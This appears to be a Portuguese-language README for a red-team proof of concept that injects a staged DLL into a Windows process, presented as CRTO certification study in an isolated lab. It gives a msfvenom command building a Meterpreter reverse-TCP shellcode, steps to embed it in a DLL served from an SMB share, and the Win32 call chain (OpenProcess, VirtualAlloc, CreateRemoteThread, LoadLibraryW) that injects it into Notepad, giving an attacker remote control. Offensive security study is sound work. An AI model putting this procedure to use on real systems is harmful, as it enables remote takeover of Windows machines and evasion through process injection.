Prova de conceito de injeção de DLL em estágios construída em C usando APIs Win32 — desenvolvida em um ambiente de laboratório isolado para estudo de certificação de red team (CRTO).
Prova de conceito de injeção DLL em estágios construída em C usando APIs Win32 — desenvolvida em ambiente de laboratório isolado para estudo de certificação de red team (CRTO).
⚠️ Aviso: Este projeto foi desenvolvido estritamente em ambiente de laboratório isolado para fins educacionais como parte de pesquisa de segurança ofensiva e estudo de certificação (CRTO). Não se destina ao uso contra qualquer sistema sem autorização explícita por escrito. O uso não autorizado é ilegal e antiético.
Uma implementação de prova de conceito de injeção DLL em estágios no Windows, construída como parte de estudos de certificação de red team. Este projeto demonstra como um stager pode carregar remotamente uma DLL maliciosa em um processo alvo usando APIs Win32 nativas. Funciona melhor em um ambiente AD que permite tráfego SMB dentro da rede interna, não recomendado para funcionar pela internet.
1. Build a shellcode with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f raw -o /directory/payload.bin
2. Obtain the raw shellcode and convert into a C array
xxd -i payload.bin > payload.h
3. Copy the shellcode, and paste it under unsigned char payload_bin[] {xxxxx} array in maindll.c
4. Modify the phc.c to point the address to your IP in dllPath[]
5. Compile phc.c into .exe, and compile maindll.c into .dll file
6. Host the smb server, and paste the maindll.dll
7. Set up Listener
8. Open Notepad.exe and find the PID
9. Run phc.exe <PID>
phc.c)OpenProcessVirtualAllocLoadLibraryW do Kernel32CreateRemoteThread que chama LoadLibraryW, carregando a DLL de um compartilhamento SMB remotomaindll.dll)DllMain é acionado automaticamente em DLL_PROCESS_ATTACHVirtualAllocCreateThreadphc.exe → Abre o processo alvo → Aloca memória no processo alvo → Carrega maindll.dll do compartilhamento SMB via LoadLibraryW → DllMain é acionado → Shellcode executado dentro do processo alvo
CreateRemoteThread + LoadLibraryWDllMainTestado no Windows 10 em ambiente de laboratório isolado. Listener C2 hospedado no Kali Linux.